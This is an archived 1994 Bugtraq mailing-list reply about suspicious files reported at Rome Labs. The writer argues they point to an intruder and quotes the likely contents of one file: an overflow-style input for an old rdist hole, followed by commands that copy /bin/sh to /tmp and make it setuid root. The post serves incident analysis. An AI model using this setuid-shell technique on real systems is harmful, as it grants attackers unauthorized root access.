Bugtraq mailing list archives
Re: Possible virus from Rome labs
From: shipley () merde dis org (Evil Pete)
Date: Wed, 30 Mar 1994 20:55:26 -0800
I just got a call from Liz Keane at Rome Labs. Apparently they have had a virus up there at Rome. It may be passed through ftp and we have ftp'd them some files lately. She said the virus puts two files in some random place on your system. The files are: jnk.tmp foosh
sounds like Crackers to me, not a virus. if foosh contains some thing like Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaa Scp /bin/sh /tmp/foosh Schmod 4755 /tmp/foosh then it was something a person used to get root through a old hole in rdist (when I look for the file foosh I found it in my directory of security toys) as for jnk.tmp I am not sure yet.
Current thread:
- Possible virus from Rome labs Ron Gilmer (Mar 30)
- Re: Possible virus from Rome labs Ben Jackson (Mar 30)
- Re: Possible virus from Rome labs Steve Simmons (Mar 30)
- Re: Possible virus from Rome labs Evil Pete (Mar 30)
- Re: Possible virus from Rome labs Aggelos D. Keromitis (Mar 31)
- Re: Possible virus from Rome labs Evil Pete (Mar 30)
- Re: Possible virus from Rome labs Gene Spafford (Mar 30)
- <Possible follow-ups>
- Re: Possible virus from Rome labs William McVey (Mar 30)
- Re: Possible virus from Rome labs scott () santafe edu (Mar 30)